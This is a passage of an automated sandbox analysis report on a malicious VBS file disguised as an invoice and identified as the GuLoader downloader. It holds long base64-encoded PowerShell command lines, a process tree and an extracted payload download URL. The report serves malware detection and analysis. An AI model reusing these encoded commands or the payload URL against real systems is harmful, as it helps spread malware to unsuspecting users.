YQB0ACAASAB5AHAAbwBwAGgAeQBzACAAQQBmAGgAbwBsAGQAcwBoAG8AdAAzACAAVABoAHkAcgBvAGMAbwBsACAAVQBEAFYAVQAgAGIAdQBmAGYAIABwAG8AbAB5AGUAdABoACAAYgByAGkAcwBrAGUAdAB1AG4AdAAgAFQAWQBFAFQAQwBPAFEAIABDAG8AbQBwAGEAIABBAGYAdABhAGwAZQBwADYAIABzAHQAaQBuAGsAaQAgAEcARQBOAE4ARQBNAEIATwBSACAAYQBmAHQAZQByAHAAIABBAGwAaQBxAHUAYQBuADEAIABhAG4AdABpAG0AbwBuAHkAZwAgAEYAcgBhAG4AdABzACAAWgBJAFQASQAgAE4AQQBHAEwARQBUAEcAIABCAEwATwBUACAAQgBlAHMAbgBhAGsAawBlADcAIABVAE4ARABUAEEAIABCAHIAYQBzAGgAbAB5AGkAZwAgAA0ACgAkAGMAaABvAG4AZAByAG8AZwBhADUAPQAwADsADQAKACMAQgBvAGwAaQBkAGUAcwBzAGwAYQA1ACAATABBAE4ARABTAFIAIABQAHIAbwBzACAAVABsAGwAZQBzADgAIABPAG0AawBsAGEAcwBzAGkAZgBpADcAIABQAGUAbgB0AGEAYwByAG8AbgBrADQAIABIAEUAUABUAEEAVAAgAFcAYQBrAGUAcgAgAHIAZQBnAGkAbwAgAFUAZwBlAHMAawByAGkANwAgAFMAbABhAHIANAAgAEYATwBSAEUATAAgAA0ACgBbAGMAaABvAG4AZAByAG8AZwBhADEAXQA6ADoAQwBEAEEAQwAoACQAYwBoAG8AbgBkAHIAbwBnAGEANAAsACQAYwBoAG8AbgBkAHIAbwBnAGEAMwAsADUAOAA3ADYANwAsAFsAcgBlAGYAXQAkAGMAaABvAG4AZAByAG8AZwBhADUALAAwACkADQAKACMAQgBFAFMASwAgAFMAdAByAGUAZQB0AHcAYQByAGQANwAgAEwAZQBqAHIAdQBkAHMAdAB5AHIANgAgAFUAbgBsAGEAbgBnAHUAIAB1AG4AawBpAG4AZAAgAEgAQQBLAE0AIAB3AHIAaQBnAGgAdAByAHkAIABCAGEAZwBnAGEAYQByAGQAZQBuADIAIABTAHUAYgBjAG8AbgB0AHIAYQA4ACAAZgBsAGEAdgAgAEcAcgBhAHYAcwB0AGUAZAA3ACAASABpAGcAaABoAGEAdABiAGEAIABTAGgAYQBoACAADQAKAFsAYwBoAG8AbgBkAHIAbwBnAGEAMQBdADoAOgBFAG4AdQBtAFcAaQBuAGQAbwB3AHMAKAAkAGMAaABvAG4AZAByAG8AZwBhADMALAAgADAAKQANAAoADQAKAA== MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • conhost.exe (PID: 6888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 4608 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline MD5: 350C52F71BDED7B99668585C15D70EEA)
        • cvtres.exe (PID: 6348 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP" MD5: C09985AE74F0882F208D75DE27770DFA)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

    Sigma Signatures

    No Sigma rule has matched

    Snort Signatures

    No Snort rule has matched

    Joe Sandbox Signatures

    Click to jump to signature section

    Show All Signature Results

    AV Detection

    barindex
    Found malware configuration
    Source: 00000010.00000002.763535179.0000000009970000.00000040.00000800.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://barsam.com.au/bin_FCWtLoO90.bin"}
    Multi AV Scanner detection for submitted file
    Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
    Source: Binary string: k7C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.pdb source: powershell.exe, 00000010.00000002.758423763.000000000554C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.758073857.000000000536C000.00000004.00000800.00020000.00000000.sdmp

    Networking

    barindex
    C2 URLs / IPs found in malware configuration
    Source: Malware configuration extractorURLs: http://barsam.com.au/bin_FCWtLoO90.bin
    Potential malicious VBS script found (has network functionality)
    Source: Initial file: Than21.SaveToFile FileName, adSaveCreateOverWrite
    Source: powershell.exe, 00000010.00000002.756793102.0000000004FF1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
    Source: powershell.exe, 00000010.00000002.757728131.000000000525D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro

    System Summary

    barindex
    Wscript starts Powershell (via cmd or directly)
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbgJump to behavior
    Very long command line found
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636
    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 16636Jump to behavior
    Source: WWVN_INVOICE_8363567453.vbsInitial sample: Strings found which are bigger than 50
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04F2E6B816_2_04F2E6B8
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF940816_2_07EF9408
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF940816_2_07EF9408
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF004016_2_07EF0040
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_07EF001F16_2_07EF001F
    Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 98%
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess Stats: CPU usage > 98%
    Source: WWVN_INVOICE_8363567453.vbsReversingLabs: Detection: 24%
    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\WWVN_INVOICE_8363567453.vbs"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcgBvACAAUwBwAGUAYwB0AHIAbwA4ACAAcwB0AGoAZQByAG4AIABQAG8AcwBpAHQAaQBvACAAQQB1AHQAbwBiAGkAbwAgAHUAdABhAGsAbgBlACAASAB1AG0AYQBuAGgAbwBvADMAIABvAG0AcABsACAAQgBlAHYAaQBzAGYAcgBlAGwAcwAzACAAQgByAGkAbABsAGUAZgBvAGQAZQA2ACAARQBKAEUATgBEAE8ATQBTACAAVAB1AHIAaQBzAHQAawA0ACAAYwBoAGEAbgB0AGEAbgB0ACAAYgBvAG4AZABlAHMAdABhACAAQgBJAEwARgBSAEEARwBUAEUAUgAgAFMASQBEAEgARQBQAFIARQAgAA0ACgAjAFMAawBpAGQAZQBuAHQAIABhAGEAbg
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\nmk1nqgs\nmk1nqgs.cmdline
    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD70A.tmp" "c:\Users\user\AppData\Local\Temp\nmk1nqgs\CSCB6EACAC7C331481095CED6A2215A0F6.TMP"
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAbgBkAGkAbgBtAGUANQAgAEIAbwBiAGwAZQBrAGEAIABBAHIAdABpAGsAdQBsAGUAcgAgAGgAbwB0AG0AIABGAG8AcgBtAG4AaQBuADQAIABWAGkAZwBlAHMAaQBtAG8AawBpADYAIABzAHQAbwBtACAARQBjAGgAaQBuAGkAdAA2ACAAcAByAG8AbgBhAHQAaQB2ACAAUAB5AHIAbwAgAFQAZQB4AHQAdAB2ADcAIABFAGwAZQB2AGEAdABvAHIAZgByACAAUgBBAE0AUgBPAEQAUwBBACAAUQBlAGsAdQByAHMAdQBzAHMAIABiAGUAYQBuAHAAbwAgAFMAawByAGsAMgAgAHAAbwBsAGEAcgBpACAAbQBlAGQAZQBvAGwAYQAgAEwAbwByAGEAIABSAGEAcABoAGkANgAgAA0ACgAjAGQAZQBmAGEAIABwAGkAZQBkACAAVABhAG4AZABrAGQAcwBiAGUAIABVAG4AaQBtAG0AbwByACAAQgBhAGQAZwBlAHIAYgA2ACAAZQB4AGMAbAB1AHMAIABDAGgAbwBuAGQAcgBvAGcAOAAgAEEARQBSAE8ATABPACAARgBJAFMASABFAFIATQBBAE4ASQAgAEYAQQBHAEkATgBUAEUARwBSACAASQBuAGMAZQBwAHQAbwAzACAAUwBuAHUAcgBsADYAIABCAGkAcwBlAHgAdQBhACAAZABvAHMAcwBlAHIAIABnAGEAdgBlAGwAIABtAGUAdABhAGYAbwByAGUAIAB0AHIAYQBuACAAYQB0AGEAawAgAFMAZQBpAHMAbQBpADIAIABOAG8AbgBmAGEAYgB1AGwAIABEAGkAZwB0AGUAawAzACAAUgBFAEcATgBTAEsAQQAgAFAAaAB5AHQAbwBtAGUAOQAgAE0AdQByAGEAZQAgAEgAYQBsAHYAOAAgAFYATwBDAEkARgBFAFIAQQBUAEUAIABXAE8ATwBEAEMAUgBBAEYAVAAgAGgAYQByAGQAaABlAGEAcgB0ACAASwBuAGkAYgAgAHMAZQBqAHQAIAANAAoAIwBJAG0AbQBlAHIAdgBrADgAIABTAHAAcgBvAGcAZgBsACAAUgBFAEQAUwBIAEkAIABzAGkAZgBmAGwAZQB1AHMAIABTAHUAcABlAHIAIAByAGkAZgB0AGUAcgBzACAARwByAG8AdQBjAGgAIABQAHIAbwBlAHYAZQB0AGkAIABQAFIATwBUAEUATgBTAEkAIABMAHkAZABiAGkAbABsAGUAZABlACAAUwBVAEIARQBMAEUAQwBUAFIAIABSAGEAbQBtAGUAdABjAGgAbwByACAAQwBJAFMAUwBFAFMAQQBSACAAQgByAGUAZAAgAGoAbwByAGQAZgBzAHQAZQAgAEEAbgB0AGkAcwBlAG4AcwAgAEwATwBYAE8AIAANAAoAIwBTAHAAbAB1AHIAZwB5AHAAeQA3ACAAUwBlAHAAdABlAG4AIABEAGkAbQBzACAAVABlAGIAcgBlAHYAcwB1AG4AYwAyACAAUwB0AHQAdABlAHAAMgAgAGwAaQBrAHYAaQBkAGUAIABBAGYAdAB2AGkAIABwAGEAbgB0AG8AZwAgAHYAZQBqAGIAeQBnACAAYwBvAGMAbwAgAEkAUwBCAFIAWQAgAFAAQQBTAFMAIABQAGkAbgBmACAAbQB1AG4AaQBrAGEAdAAgAHUAbgBzAGUAIABHAFUATABEAFIAIABNAGUAbABvAGQAaQBvAHUAIABwAGEAbgBpAG0AZQB0AGUAIABSAGEAZgB0AGUAcwBvAHMAdABlACAAYQB2AGEAbgBjAGUAbQBlAG4AdAAgAEUAbgB0AGUAYQBzAHUAYgBwAHIAIABNAFkAQwBFACAAVABpAGQAbABuAG4AZQBkAGUAMwAgAG8AZAB5AHMAcwBlAG4AIABkAHIAeQBwAHQAcgByAGUAbgAgAHAAZQByAHMAbwAgAA0ACgAjAGgAbwByAG4AIABDAGUAbgB0AHIANAAgAEgAZQBuAHIAeQBrAGsAZQBzAGwAOAAgAEYATwBSAEQAQQBNAFAATgBJAE4AIABJAG4AdAByAGEAZgBvAGwAIABDAGEAbABkAHIAbwBuACAAaQBuAGYAcgAgAHYAYQBsAGcAIABTAEkAUwBZAFIASQAgAEcAZQBuAG8AYQBrAG8AIABzAGsAYQBkAGUAZwByAGUAcgAgAFUAbgBkAGUAcgBhAGYAcwBuAGkAMgAgAFYAYQBjAGMAaQBuAGEAdAAgAGQAcgBpAGwAbABlAHIAaQBlAHIAIABDAEgAQQBJACAADQAKACMARABlAHQAbwB4AGkAZgAgAGEAZgBtAGEAbABpACAASABtAG0AZQB0AG4AIABBAGwAawBvAGgAbwBsAHQAeQBwADkAIABsAGkAbgBpAGUAIABUAEEAQQBSAE4AIABtAGUAcg